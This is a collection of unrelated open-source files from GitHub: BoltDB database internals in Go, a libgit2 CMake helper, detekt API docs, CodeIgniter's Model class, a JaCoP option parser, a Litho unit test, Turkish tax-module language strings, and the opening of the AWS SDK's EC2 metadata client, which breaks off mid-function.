	fn func(*Tx) error
	err chan<- error
}
// batch is a group of Batch calls that run together in one read-write
// transaction.
type batch struct {
	db *DB
	timer *time.Timer // fires trigger after DB.MaxBatchDelay
	start sync.Once // guarantees run executes at most once
	calls []call
}
// trigger runs the batch if it hasn't already been run.
// Safe to call from both the timer and the size-threshold path in Batch.
func (b *batch) trigger() {
	b.start.Do(b.run)
}
// run performs the transactions in the batch and communicates results
// back to DB.Batch.
func (b *batch) run() {
	b.db.batchMu.Lock()
	b.timer.Stop()
	// Make sure no new work is added to this batch, but don't break
	// other batches.
	if b.db.batch == b {
		b.db.batch = nil
	}
	b.db.batchMu.Unlock()

retry:
	for len(b.calls) > 0 {
		var failIdx = -1
		err := b.db.Update(func(tx *Tx) error {
			// Run every queued function inside the shared transaction;
			// the first failure aborts (and rolls back) the whole attempt.
			for i, c := range b.calls {
				if err := safelyCall(c.fn, tx); err != nil {
					failIdx = i
					return err
				}
			}
			return nil
		})

		if failIdx >= 0 {
			// take the failing transaction out of the batch. it's
			// safe to shorten b.calls here because db.batch no longer
			// points to us, and we hold the mutex anyway.
			c := b.calls[failIdx]
			b.calls[failIdx], b.calls = b.calls[len(b.calls)-1], b.calls[:len(b.calls)-1]
			// tell the submitter re-run it solo, continue with the rest of the batch
			c.err <- trySolo
			continue retry
		}

		// pass success, or bolt internal errors, to all callers
		for _, c := range b.calls {
			if c.err != nil {
				c.err <- err
			}
		}
		break retry
	}
}
// trySolo is a special sentinel error value used for signaling that a
// transaction function should be re-run. It should never be seen by
// callers. It is compared by identity in DB.Batch.
var trySolo = errors.New("batch function returned an error and should be re-run solo")
// panicked wraps a value recovered from a panic so it can travel as an
// ordinary error (see safelyCall).
type panicked struct {
	reason interface{}
}
// Error renders the recovered panic value as an error message.
func (p panicked) Error() string {
	switch v := p.reason.(type) {
	case error:
		return v.Error()
	default:
		return fmt.Sprintf("panic: %v", v)
	}
}
// safelyCall invokes fn with tx, converting any panic raised by fn into
// an ordinary error so one bad batch entry cannot crash the process.
func safelyCall(fn func(*Tx) error, tx *Tx) (err error) {
	defer func() {
		if r := recover(); r != nil {
			err = panicked{reason: r}
		}
	}()
	return fn(tx)
}
// Sync executes fdatasync() against the database file handle.
//
// This is not necessary under normal operation, however, if you use NoSync
// then it allows you to force the database file to sync against the disk.
func (db *DB) Sync() error { return fdatasync(db) }
// Stats returns a snapshot of the database's performance counters.
// The counters are only updated when a transaction closes.
func (db *DB) Stats() Stats {
	db.statlock.RLock()
	snapshot := db.stats
	db.statlock.RUnlock()
	return snapshot
}
// Info exposes the raw address and page size of the current mmap.
// This is for internal access to the raw data bytes from the C cursor, use
// carefully, or not at all. The address is only valid until the next remap.
func (db *DB) Info() *Info {
	return &Info{uintptr(unsafe.Pointer(&db.data[0])), db.pageSize}
}
// page retrieves a page reference from the mmap based on the current page size.
// The returned pointer aliases the mmap and is invalidated by a remap.
func (db *DB) page(id pgid) *page {
	pos := id * pgid(db.pageSize)
	return (*page)(unsafe.Pointer(&db.data[pos]))
}
// pageInBuffer retrieves a page reference from a given byte array based on the current page size.
// The returned pointer aliases b, so b must outlive the page reference.
func (db *DB) pageInBuffer(b []byte, id pgid) *page {
	return (*page)(unsafe.Pointer(&b[id*pgid(db.pageSize)]))
}
// meta retrieves the current meta page reference.
func (db *DB) meta() *meta {
	// We have to return the meta with the highest txid which doesn't fail
	// validation. Otherwise, we can cause errors when in fact the database is
	// in a consistent state. metaA is the one with the higher txid.
	metaA := db.meta0
	metaB := db.meta1
	if db.meta1.txid > db.meta0.txid {
		metaA = db.meta1
		metaB = db.meta0
	}

	// Use higher meta page if valid. Otherwise fallback to previous, if valid.
	if err := metaA.validate(); err == nil {
		return metaA
	} else if err := metaB.validate(); err == nil {
		return metaB
	}

	// This should never be reached, because both meta1 and meta0 were validated
	// on mmap() and we do fsync() on every write.
	panic("bolt.DB.meta(): invalid meta pages")
}
// allocate returns a contiguous block of memory starting at a given page.
// Must only be called while a read-write transaction (db.rwtx) is open.
func (db *DB) allocate(count int) (*page, error) {
	// Allocate a temporary buffer for the page.
	// Single-page requests are served from the pool to reduce allocations.
	var buf []byte
	if count == 1 {
		buf = db.pagePool.Get().([]byte)
	} else {
		buf = make([]byte, count*db.pageSize)
	}
	p := (*page)(unsafe.Pointer(&buf[0]))
	p.overflow = uint32(count - 1)

	// Use pages from the freelist if they are available.
	// An id of 0 means the freelist had no contiguous run of `count` pages.
	if p.id = db.freelist.allocate(count); p.id != 0 {
		return p, nil
	}

	// Resize mmap() if we're at the end.
	p.id = db.rwtx.meta.pgid
	var minsz = int((p.id+pgid(count))+1) * db.pageSize
	if minsz >= db.datasz {
		if err := db.mmap(minsz); err != nil {
			return nil, fmt.Errorf("mmap allocate error: %s", err)
		}
	}

	// Move the page id high water mark.
	db.rwtx.meta.pgid += pgid(count)

	return p, nil
}
// grow grows the size of the database to the given sz.
func (db *DB) grow(sz int) error {
	// Ignore if the new size is less than available file size.
	if sz <= db.filesz {
		return nil
	}

	// If the data is smaller than the alloc size then only allocate what's needed.
	// Once it goes over the allocation size then allocate in chunks.
	if db.datasz < db.AllocSize {
		sz = db.datasz
	} else {
		sz += db.AllocSize
	}

	// Truncate and fsync to ensure file size metadata is flushed.
	// https://github.com/boltdb/bolt/issues/284
	// NOTE(review): Truncate is skipped on Windows — presumably the file is
	// grown elsewhere (mmap path) on that platform; confirm before changing.
	if !db.NoGrowSync && !db.readOnly {
		if runtime.GOOS != "windows" {
			if err := db.file.Truncate(int64(sz)); err != nil {
				return fmt.Errorf("file resize error: %s", err)
			}
		}
		if err := db.file.Sync(); err != nil {
			return fmt.Errorf("file sync error: %s", err)
		}
	}

	db.filesz = sz
	return nil
}
// IsReadOnly reports whether the database was opened with Options.ReadOnly.
func (db *DB) IsReadOnly() bool {
	return db.readOnly
}
// Options represents the options that can be set when opening a database.
type Options struct {
	// Timeout is the amount of time to wait to obtain a file lock.
	// When set to zero it will wait indefinitely. This option is only
	// available on Darwin and Linux.
	Timeout time.Duration

	// Sets the DB.NoGrowSync flag before memory mapping the file.
	NoGrowSync bool

	// Open database in read-only mode. Uses flock(..., LOCK_SH |LOCK_NB) to
	// grab a shared lock (UNIX).
	ReadOnly bool

	// Sets the DB.MmapFlags flag before memory mapping the file.
	MmapFlags int

	// InitialMmapSize is the initial mmap size of the database
	// in bytes. Read transactions won't block write transaction
	// if the InitialMmapSize is large enough to hold database mmap
	// size. (See DB.Begin for more information)
	//
	// If <=0, the initial map size is 0.
	// If initialMmapSize is smaller than the previous database size,
	// it takes no effect.
	InitialMmapSize int
}
// DefaultOptions represent the options used if nil options are passed into Open().
// No timeout is used which will cause Bolt to wait indefinitely for a lock.
var DefaultOptions = &Options{
	Timeout:    0,
	NoGrowSync: false,
}
// Stats represents statistics about the database.
// Freelist fields are point-in-time gauges; transaction fields accumulate.
type Stats struct {
	// Freelist stats
	FreePageN     int // total number of free pages on the freelist
	PendingPageN  int // total number of pending pages on the freelist
	FreeAlloc     int // total bytes allocated in free pages
	FreelistInuse int // total bytes used by the freelist

	// Transaction stats
	TxN     int // total number of started read transactions
	OpenTxN int // number of currently open read transactions

	TxStats TxStats // global, ongoing stats.
}
// Sub calculates and returns the difference between two sets of database stats.
// This is useful when obtaining stats at two different points and time and
// you need the performance counters that occurred within that time span.
func (s *Stats) Sub(other *Stats) Stats {
	if other == nil {
		return *s
	}
	var diff Stats
	// Freelist numbers are point-in-time gauges, so they are copied from the
	// newer snapshot rather than subtracted.
	diff.FreePageN = s.FreePageN
	diff.PendingPageN = s.PendingPageN
	diff.FreeAlloc = s.FreeAlloc
	diff.FreelistInuse = s.FreelistInuse
	// Transaction counters accumulate, so report the delta.
	diff.TxN = s.TxN - other.TxN
	diff.TxStats = s.TxStats.Sub(&other.TxStats)
	return diff
}
// add merges the transaction stats from other into s.
// Only TxStats accumulates; the gauge fields are set elsewhere.
func (s *Stats) add(other *Stats) {
	s.TxStats.add(&other.TxStats)
}
// Info describes the raw memory region backing the database mmap.
type Info struct {
	Data uintptr // address of the first mapped byte
	PageSize int // database page size in bytes
}
// meta is the on-disk database header stored in pages 0 and 1.
type meta struct {
	magic uint32 // marker identifying a bolt file
	version uint32 // file format version
	pageSize uint32 // page size the file was created with
	flags uint32
	root bucket // root bucket reference
	freelist pgid // page id of the freelist page
	pgid pgid // high water mark: first unused page id
	txid txid // transaction id that wrote this meta
	checksum uint64 // FNV-64a over the preceding fields (see sum64)
}
// validate checks the marker bytes and version of the meta page to ensure
// it matches this binary, and verifies the stored checksum when one is
// present. A zero checksum is treated as "not recorded" and skipped.
func (m *meta) validate() error {
	switch {
	case m.magic != magic:
		return ErrInvalid
	case m.version != version:
		return ErrVersionMismatch
	case m.checksum != 0 && m.checksum != m.sum64():
		return ErrChecksum
	default:
		return nil
	}
}
// copy copies one meta object to another.
// Plain struct assignment is sufficient: meta contains no pointers.
func (m *meta) copy(dest *meta) {
	*dest = *m
}
// write writes the meta onto a page.
func (m *meta) write(p *page) {
	// Sanity-check that no page reference points past the high water mark.
	if m.root.root >= m.pgid {
		panic(fmt.Sprintf("root bucket pgid (%d) above high water mark (%d)", m.root.root, m.pgid))
	} else if m.freelist >= m.pgid {
		panic(fmt.Sprintf("freelist pgid (%d) above high water mark (%d)", m.freelist, m.pgid))
	}

	// Page id is either going to be 0 or 1 which we can determine by the transaction ID.
	p.id = pgid(m.txid % 2)
	p.flags |= metaPageFlag

	// Calculate the checksum.
	m.checksum = m.sum64()

	m.copy(p.meta())
}
// sum64 generates the checksum for the meta.
// It hashes the raw bytes of every field up to — but excluding — the
// checksum field itself (unsafe.Offsetof gives that byte count).
func (m *meta) sum64() uint64 {
	var h = fnv.New64a()
	_, _ = h.Write((*[unsafe.Offsetof(meta{}.checksum)]byte)(unsafe.Pointer(m))[:])
	return h.Sum64()
}
// _assert panics with the formatted message when condition is false.
func _assert(condition bool, msg string, v ...interface{}) {
	if condition {
		return
	}
	panic(fmt.Sprintf("assertion failed: "+msg, v...))
}
// warn writes the values to standard error, space-separated, with a newline.
func warn(v ...interface{}) { fmt.Fprintln(os.Stderr, v...) }
// warnf writes the formatted message to standard error, appending a newline.
func warnf(msg string, v ...interface{}) { fmt.Fprintf(os.Stderr, msg+"\n", v...) }
// printstack writes the current goroutine's stack trace to standard error,
// dropping the first two lines of the debug.Stack output.
func printstack() {
	stack := strings.Join(strings.Split(string(debug.Stack()), "\n")[2:], "\n")
	fmt.Fprintln(os.Stderr, stack)
}
| {
"pile_set_name": "Github"
} |
# This function splits the sources files up into their appropriate
# subdirectories. This is especially useful for IDEs like Xcode and
# Visual Studio, so that you can navigate into the libgit2_clar project,
# and see the folders within the tests folder (instead of just seeing all
# source and tests in a single folder.)
FUNCTION(IDE_SPLIT_SOURCES target)
	# Source groups are only understood by the Visual Studio and Xcode generators.
	IF(MSVC_IDE OR CMAKE_GENERATOR STREQUAL Xcode)
		GET_TARGET_PROPERTY(sources ${target} SOURCES)
		FOREACH(source ${sources})
			# Only files that carry a directory component can be grouped.
			IF(source MATCHES ".*/")
				# Make the path relative to the project root.
				STRING(REPLACE ${libgit2_SOURCE_DIR}/ "" rel ${source})
				IF(rel)
					# Strip the file name, keeping only the directory part.
					STRING(REGEX REPLACE "/([^/]*)$" "" rel ${rel})
					IF(rel)
						# SOURCE_GROUP expects backslash-separated group names.
						STRING(REPLACE "/" "\\\\" rel ${rel})
						SOURCE_GROUP(${rel} FILES ${source})
					ENDIF()
				ENDIF()
			ENDIF()
		ENDFOREACH()
	ENDIF()
ENDFUNCTION()
| {
"pile_set_name": "Github"
} |
---
title: Companion -
---
//[detekt-api](../../../index.md)/[io.gitlab.arturbosch.detekt.api.internal](../../index.md)/[YamlConfig](../index.md)/[Companion](index.md)
# Companion
[jvm] object [Companion](index.md)
## Functions
| Name| Summary|
|---|---|
| [equals](index.md#kotlin/Any/equals/#kotlin.Any?/PointingToDeclaration/)| [jvm] <br>Content <br>open operator override fun [equals](index.md#kotlin/Any/equals/#kotlin.Any?/PointingToDeclaration/)(other: [Any](https://kotlinlang.org/api/latest/jvm/stdlib/kotlin/-any/index.html)?): [Boolean](https://kotlinlang.org/api/latest/jvm/stdlib/kotlin/-boolean/index.html) <br><br><br>
| [hashCode](index.md#kotlin/Any/hashCode/#/PointingToDeclaration/)| [jvm] <br>Content <br>open override fun [hashCode](index.md#kotlin/Any/hashCode/#/PointingToDeclaration/)(): [Int](https://kotlinlang.org/api/latest/jvm/stdlib/kotlin/-int/index.html) <br><br><br>
| [load](load.md)| [jvm] <br>Brief description <br><br><br><br><br>Constructs a [YamlConfig](../index.md) from any [Reader](https://docs.oracle.com/javase/8/docs/api/java/io/Reader.html).<br><br><br><br>Note the reader will be consumed and closed.<br><br><br><br> <br>Content <br>fun [load](load.md)(reader: [Reader](https://docs.oracle.com/javase/8/docs/api/java/io/Reader.html)): [Config](../../../io.gitlab.arturbosch.detekt.api/-config/index.md) <br><br><br>[jvm] <br>Brief description <br><br><br>Factory method to load a yaml configuration. Given path must exist and point to a readable file.<br><br> <br>Content <br>fun [load](load.md)(path: [Path](https://docs.oracle.com/javase/8/docs/api/java/nio/file/Path.html)): [Config](../../../io.gitlab.arturbosch.detekt.api/-config/index.md) <br><br><br>
| [loadResource](load-resource.md)| [jvm] <br>Brief description <br><br><br>Factory method to load a yaml configuration from a URL.<br><br> <br>Content <br>fun [loadResource](load-resource.md)(url: [URL](https://docs.oracle.com/javase/8/docs/api/java/net/URL.html)): [Config](../../../io.gitlab.arturbosch.detekt.api/-config/index.md) <br><br><br>
| [toString](index.md#kotlin/Any/toString/#/PointingToDeclaration/)| [jvm] <br>Content <br>open override fun [toString](index.md#kotlin/Any/toString/#/PointingToDeclaration/)(): [String](https://kotlinlang.org/api/latest/jvm/stdlib/kotlin/-string/index.html) <br><br><br>
| {
"pile_set_name": "Github"
} |
<?php
/**
* CodeIgniter
*
* An open source application development framework for PHP 5.2.4 or newer
*
* NOTICE OF LICENSE
*
* Licensed under the Open Software License version 3.0
*
* This source file is subject to the Open Software License (OSL 3.0) that is
* bundled with this package in the files license.txt / license.rst. It is
* also available through the world wide web at this URL:
* http://opensource.org/licenses/OSL-3.0
* If you did not receive a copy of the license and are unable to obtain it
* through the world wide web, please send an email to
* [email protected] so we can send you a copy immediately.
*
* @package CodeIgniter
* @author EllisLab Dev Team
* @copyright Copyright (c) 2008 - 2013, EllisLab, Inc. (http://ellislab.com/)
* @license http://opensource.org/licenses/OSL-3.0 Open Software License (OSL 3.0)
* @link http://codeigniter.com
* @since Version 1.0
* @filesource
*/
defined('BASEPATH') OR exit('No direct script access allowed');
/**
* Model Class
*
* @package CodeIgniter
* @subpackage Libraries
* @category Libraries
* @author EllisLab Dev Team
* @link http://codeigniter.com/user_guide/libraries/config.html
*/
class CI_Model {

	/**
	 * Class constructor
	 *
	 * Logs a debug message so model instantiation shows up in the log trail.
	 *
	 * @return	void
	 */
	public function __construct()
	{
		log_message('debug', 'Model Class Initialized');
	}

	// --------------------------------------------------------------------

	/**
	 * __get magic
	 *
	 * Allows models to access CI's loaded classes using the same
	 * syntax as controllers, by delegating unknown property reads to
	 * the CodeIgniter super object.
	 *
	 * @param	string	$key	Property (library/loader) name being accessed
	 * @return	mixed	The corresponding property of the CI super object
	 */
	public function __get($key)
	{
		return get_instance()->$key;
	}

}
/* End of file Model.php */
/* Location: ./system/core/Model.php */ | {
"pile_set_name": "Github"
} |
/*
* OptParse.java
* <p>
* This file is part of JaCoP.
* <p>
* JaCoP is a Java Constraint Programming solver.
* <p>
* Copyright (C) 2000-2008 Krzysztof Kuchcinski and Radoslaw Szymanek
* <p>
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
* <p>
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
* <p>
* Notwithstanding any other provision of this License, the copyright
* owners of this work supplement the terms of this License with terms
* prohibiting misrepresentation of the origin of this work and requiring
* that modified versions of this work be marked in reasonable ways as
* different from the original version. This supplement of the license
* terms is in accordance with Section 7 of GNU Affero General Public
* License version 3.
* <p>
* You should have received a copy of the GNU Affero General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package org.jacop.jasat.utils;
import java.util.*;
/**
* util to parse command-line arguments
*
* @author Simon Cruanes and Radoslaw Szymanek
* @version 4.7
*/
public class OptParse<E> {

    // remaining (true) args, i.e. everything that was not parsed as an option
    public String[] realArgs;

    // handlers, keyed by both "-x" (short) and "--xxx" (long) spellings
    private Map<String, OptHandler<E>> handlers = new HashMap<String, OptHandler<E>>();

    // the main help string
    private String mainHelp = "";

    /**
     * add a handler for some option
     *
     * Registers the handler under its long name ("--xxx") and/or its short
     * name ("-x"); a handler with neither is silently never reachable.
     *
     * @param handler the handler
     */
    public void addHandler(OptHandler<E> handler) {
        if (handler.longOpt != null)
            handlers.put("--" + handler.longOpt, handler);
        if (handler.shortOpt != '\0')
            handlers.put("-" + handler.shortOpt, handler);
    }

    /**
     * change the main help string, which will be printed if asked, or
     * if a wrong option is given
     *
     * @param helpString the help string
     */
    public void setHelp(String helpString) {
        this.mainHelp = helpString;
    }

    /**
     * Parses args, dispatching "-x"/"--xxx[=value]" tokens to registered
     * handlers and collecting the remaining tokens into realArgs.
     *
     * @param args the raw command-line arguments
     * @param e the initial value threaded through the handlers
     * @return the value produced by the last handler (or e unchanged), or
     *         null when an unknown option was encountered (help is printed).
     */
    public E parse(String[] args, E e) {
        realArgs = new String[args.length];
        int realIndex = 0;

        // the object
        E current = e;

        // iterate on arguments
        for (int i = 0; i < args.length; i++) {

            if (args[i].startsWith("-") || args[i].startsWith("--")) {

                if (args[i].equals("-")) {
                    // exception: a lone "-" is conventionally an argument
                    // (e.g. stdin), not an option
                    realArgs[realIndex++] = args[i];
                    continue;
                }

                // parse this as an option; split "key=value" when "=" present
                int loc = args[i].indexOf("=");
                String key = (loc > 0) ? args[i].substring(0, loc) : args[i];
                String value = (loc > 0) ? args[i].substring(loc + 1) : "";

                if (!handlers.containsKey(key)) {
                    // this option is not registered
                    System.out.println("unknown option: " + key);
                    printHelp();
                    return null;
                } else {
                    current = handlers.get(key).handle(this, current, value);
                }
            } else {
                realArgs[realIndex++] = args[i];
            }
        }

        // truncate the "real args" array and return the E value
        this.realArgs = Arrays.copyOf(realArgs, realIndex);
        return current;
    }

    /**
     * print help of all options
     */
    public void printHelp() {
        // print the main help message
        System.out.println(mainHelp);
        System.out.println("options:");

        // print (only once for each handler) its help; a handler registered
        // under both a short and a long name appears twice in the map
        Set<OptHandler<E>> printedHelps = new HashSet<OptHandler<E>>();
        for (OptHandler<E> handler : handlers.values()) {
            if (printedHelps.contains(handler))
                continue;
            else
                printedHelps.add(handler);
            // print help for this handler
            String msg = String.format("-%c, --%-16s %s", handler.shortOpt, handler.longOpt, handler.help);
            System.out.println(msg);
        }
    }

    /**
     * a handler can call this to interrupt the parsing
     *
     * NOTE(review): parse() does not catch this RuntimeException, so it
     * propagates to the caller of parse(); confirm that is the intent.
     */
    public void exitParsing() {
        throw new RuntimeException("stop parsing");
    }

    /**
     * a class to handle one option
     *
     * @param E the object to apply modifications to
     * @author simon
     */
    public static abstract class OptHandler<E> {

        // short name of the option ('\0' means no short form)
        public char shortOpt;

        // long name of the option (null means no long form)
        public String longOpt;

        // help string
        public String help;

        /**
         * handler for the option
         *
         * @param parser the parser object that called this handler
         * @param e the object to modify according to the option
         * @param arg the (optional) argument to the option
         * @return a value of the good type (not necessarily the given one)
         */
        public abstract E handle(OptParse<E> parser, E e, String arg);
    }

}
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) Facebook, Inc. and its affiliates.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.facebook.litho;
import static com.facebook.litho.LifecycleStep.getSteps;
import static org.assertj.core.api.Java6Assertions.assertThat;
import com.facebook.litho.testing.LithoViewRule;
import com.facebook.litho.testing.testrunner.LithoTestRunner;
import com.facebook.litho.widget.LayoutSpecTriggerTester;
import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.atomic.AtomicReference;
import org.junit.Rule;
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(LithoTestRunner.class)
public class LayoutSpecTriggerTest {

  public final @Rule LithoViewRule mLithoViewRule = new LithoViewRule();

  /**
   * Mounts a LayoutSpecTriggerTester, fires its test event through a Handle,
   * and verifies that the @OnTrigger method ran and received the payload.
   */
  @Test
  public void layoutSpec_setRootAndTriggerEvent_eventIsTriggered() {
    final ComponentContext c = mLithoViewRule.getContext();

    final List<LifecycleStep.StepInfo> steps = new ArrayList<>();
    final AtomicReference<Object> receivedObject = new AtomicReference<>();
    final Handle handle = new Handle();

    final Component root =
        LayoutSpecTriggerTester.create(c)
            .steps(steps)
            .triggerObjectRef(receivedObject)
            .handle(handle)
            .build();
    mLithoViewRule.setRoot(root);
    mLithoViewRule.attachToWindow().measure().layout();

    final Object payload = new Object();
    // We need to use a ComponentContext with a ComponentTree on it
    LayoutSpecTriggerTester.triggerTestEvent(
        mLithoViewRule.getComponentTree().getContext(), handle, payload);

    assertThat(getSteps(steps))
        .describedAs("Should call @OnTrigger method")
        .containsExactly(LifecycleStep.ON_TRIGGER);
    assertThat(receivedObject.get())
        .describedAs("Event object is correctly passed")
        .isEqualTo(payload);
  }
}
| {
"pile_set_name": "Github"
} |
<?php
/**
 * Turkish (tr) language strings for the Taxes module.
 *
 * Each entry maps a "taxes_"-prefixed language key to its Turkish
 * translation. Keys are kept in alphabetical order; values are
 * user-visible text, so edit them only to fix the translation itself.
 */
$lang["taxes_add_exception"] = "İstisna Ekle";
$lang["taxes_cascade"] = "Kademeli";
$lang["taxes_cascade_sequence"] = "Kademeli Sıra";
$lang["taxes_city"] = "Şehir";
$lang["taxes_code"] = "Kod";
$lang["taxes_confirm_delete"] = "Bu Vergi Kodunu silmek istediğinize emin misiniz? Bu eylem geri alınamaz";
$lang["taxes_confirm_restore"] = "Seçili Vergi Kodlarını geri yüklemek istediğinizden emin misiniz?";
$lang["taxes_default_tax_category"] = "Varsayılan Vergi Kategorisi";
$lang["taxes_default_tax_rate"] = "Varsayılan Vergi Oranı";
$lang["taxes_error_adding_updating"] = "Vergi Kodu ekleme ya da güncelleme başarısız oldu";
$lang["taxes_group_seq"] = "Küme Sırası";
$lang["taxes_jurisdiction_name"] = "Yetki Adı";
$lang["taxes_name"] = "Ad";
$lang["taxes_new"] = "Yeni Vergi Kodu";
$lang["taxes_no_taxes_to_display"] = "Görüntülenecek Vergi Kodu Yok";
$lang["taxes_reporting_authority"] = "Rapor Makamı";
$lang["taxes_round_half_down"] = "Yarım Aşağı";
$lang["taxes_round_half_even"] = "Yarım Çift";
$lang["taxes_round_half_odd"] = "Yarım Tek";
$lang["taxes_round_half_up"] = "Yarım Yukarı";
$lang["taxes_rounding_code"] = "Yuvarlama Kodu";
$lang["taxes_sales_tax"] = "Satış Vergisi";
$lang["taxes_sales_tax_by_invoice"] = "Fatura ile Satış Vergisi";
$lang["taxes_sequence"] = "Sıra";
$lang["taxes_state"] = "Eyalet";
$lang["taxes_successful_deleted"] = "Başarıyla sildiniz";
$lang["taxes_tax_categories"] = "Vergi Kategorileri";
$lang["taxes_tax_categories_configuration"] = "Vergi Kategorileri Yapılandırması";
$lang["taxes_tax_categories_saved_successfully"] = "Vergi Kategorileri değişiklikleri kaydedildi";
$lang["taxes_tax_categories_saved_unsuccessfully"] = "Vergi Kategorileri değişiklikleri kaydedilmedi";
$lang["taxes_tax_category"] = "Vergi Kategorisi";
$lang["taxes_tax_category_code"] = "Vergi Kategori Kodu";
$lang["taxes_tax_category_duplicate"] = "Yinelenen vergi kategorisi";
$lang["taxes_tax_category_invalid_chars"] = "Vergi kategorisi adında geçersiz karakterler";
$lang["taxes_tax_category_name"] = "Vergi Kategorisi Adı";
$lang["taxes_tax_category_new"] = "Yeni Vergi Kategorisi";
$lang["taxes_tax_category_required"] = "Vergi kategorisi gerekli";
$lang["taxes_tax_code"] = "Vergi Kodu";
$lang["taxes_tax_code_cannot_be_deleted"] = "Vergi Kodu silme işlemi başarısız oldu";
$lang["taxes_tax_code_duplicate"] = "Yinelenen vergi kodu";
$lang["taxes_tax_code_invalid_chars"] = "Vergi kodunda geçersiz karakterler";
$lang["taxes_tax_code_name"] = "Vergi Kodu Adı";
$lang["taxes_tax_code_required"] = "Vergi Kodu zorunlu bir alandır";
$lang["taxes_tax_code_successful_deleted"] = "Vergi Kodunu başarıyla sildiniz";
$lang["taxes_tax_code_successful_updated"] = "Başarıyla güncellediniz";
$lang["taxes_tax_code_successful_updating"] = "Vergi Kodunu başarıyla güncellediniz";
$lang["taxes_tax_code_successfully_added"] = "Başarıyla eklediniz";
$lang["taxes_tax_code_type"] = "Vergi Kodu Türü";
$lang["taxes_tax_codes"] = "Vergi Kodları";
$lang["taxes_tax_codes_configuration"] = "Vergi Kodları Yapılandırması";
$lang["taxes_tax_codes_saved_successfully"] = "Vergi Kodu değişiklikleri kaydedildi";
$lang["taxes_tax_codes_saved_unsuccessfully"] = "Vergi Kodu değişiklikleri kaydedilmedi";
$lang["taxes_tax_excluded"] = "Vergi hariç";
$lang["taxes_tax_group"] = "Vergi Kümesi";
$lang["taxes_tax_group_not_unique"] = "%1 Vergi Kümesi eşsiz değil";
$lang["taxes_tax_group_sequence"] = "Vergi Kümesi Sırası";
$lang["taxes_tax_included"] = "Vergi dahil";
$lang["taxes_tax_jurisdiction"] = "Vergi Yargı Yetkisi";
$lang["taxes_tax_jurisdiction_duplicate"] = "Yinelenen vergi yetkisi";
$lang["taxes_tax_jurisdiction_invalid_chars"] = "Yetki adında geçersiz karakterler";
$lang["taxes_tax_jurisdiction_required"] = "Vergi yargı yetkisi gerekiyor";
$lang["taxes_tax_jurisdictions"] = "Vergi Yargı Yetkisi";
$lang["taxes_tax_jurisdictions_configuration"] = "Vergi Yargı Yetkisi Yapılandırması";
$lang["taxes_tax_jurisdictions_saved_successfully"] = "Vergi Yargı yetkisi değişiklikleri kaydedildi";
$lang["taxes_tax_jurisdictions_saved_unsuccessfully"] = "Vergi Yargı yetkisi değişiklikleri kaydedilmedi";
$lang["taxes_tax_rate"] = "Vergi Oranı";
$lang["taxes_tax_rate_configuration"] = "Vergi Oranı Yapılandırması";
$lang["taxes_tax_rate_error_adding_updating"] = "Vergi Oranı ekleme veya güncelleme işlemi başarısız oldu";
$lang["taxes_tax_rate_numeric"] = "Vergi Oranı bir sayı olmalıdır";
$lang["taxes_tax_rate_required"] = "Vergi Oranı zorunlu bir alandır";
$lang["taxes_tax_rate_successful_updated"] = "Başarıyla güncellendi";
$lang["taxes_tax_rate_successfully_added"] = "Başarıyla ekledi";
$lang["taxes_tax_rates"] = "Vergi Oranları";
$lang["taxes_tax_rates_configuration"] = "Vergi Oranları Yapılandırması";
$lang["taxes_tax_rounding"] = "Vergi Yuvarlama";
$lang["taxes_tax_type"] = "Tür";
$lang["taxes_update"] = "Vergi Oranını Güncelle";
$lang["taxes_vat_tax"] = "KDV Vergisi";
| {
"pile_set_name": "Github"
} |
// Package ec2metadata provides the client for making API calls to the
// EC2 Metadata service.
//
// This package's client can be disabled completely by setting the environment
// variable "AWS_EC2_METADATA_DISABLED=true". This environment variable set to
// true instructs the SDK to disable the EC2 Metadata client. The client cannot
// be used while the environment variable is set to true, (case insensitive).
package ec2metadata
import (
"bytes"
"errors"
"io"
"net/http"
"os"
"strconv"
"strings"
"time"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/awserr"
"github.com/aws/aws-sdk-go/aws/client"
"github.com/aws/aws-sdk-go/aws/client/metadata"
"github.com/aws/aws-sdk-go/aws/corehandlers"
"github.com/aws/aws-sdk-go/aws/request"
)
const (
	// ServiceName is the name of the service.
	ServiceName = "ec2metadata"

	// disableServiceEnvVar is the environment variable that, when set to
	// "true" (case-insensitive), disables the client entirely; see NewClient.
	disableServiceEnvVar = "AWS_EC2_METADATA_DISABLED"

	// Headers for Token and TTL
	ttlHeader   = "x-aws-ec2-metadata-token-ttl-seconds"
	tokenHeader = "x-aws-ec2-metadata-token"

	// Named Handler constants
	fetchTokenHandlerName          = "FetchTokenHandler"
	unmarshalMetadataHandlerName   = "unmarshalMetadataHandler"
	unmarshalTokenHandlerName      = "unmarshalTokenHandler"
	enableTokenProviderHandlerName = "enableTokenProviderHandler"

	// TTL constants
	defaultTTL          = 21600 * time.Second // 21600s = 6 hours
	ttlExpirationWindow = 30 * time.Second    // safety margin around token expiry; consumed by the token provider (defined elsewhere in this package)
)

// A EC2Metadata is an EC2 Metadata service Client.
// It embeds the shared SDK client, so all generic request plumbing applies.
type EC2Metadata struct {
	*client.Client
}
// New returns an EC2Metadata client built from the given session/config
// provider plus any additional configs. The returned client is safe to use
// across multiple goroutines.
//
// Example:
//	// Create a EC2Metadata client from just a session.
//	svc := ec2metadata.New(mySession)
//
//	// Create a EC2Metadata client with additional configuration
//	svc := ec2metadata.New(mySession, aws.NewConfig().WithLogLevel(aws.LogDebugHTTPBody))
func New(p client.ConfigProvider, cfgs ...*aws.Config) *EC2Metadata {
	resolved := p.ClientConfig(ServiceName, cfgs...)
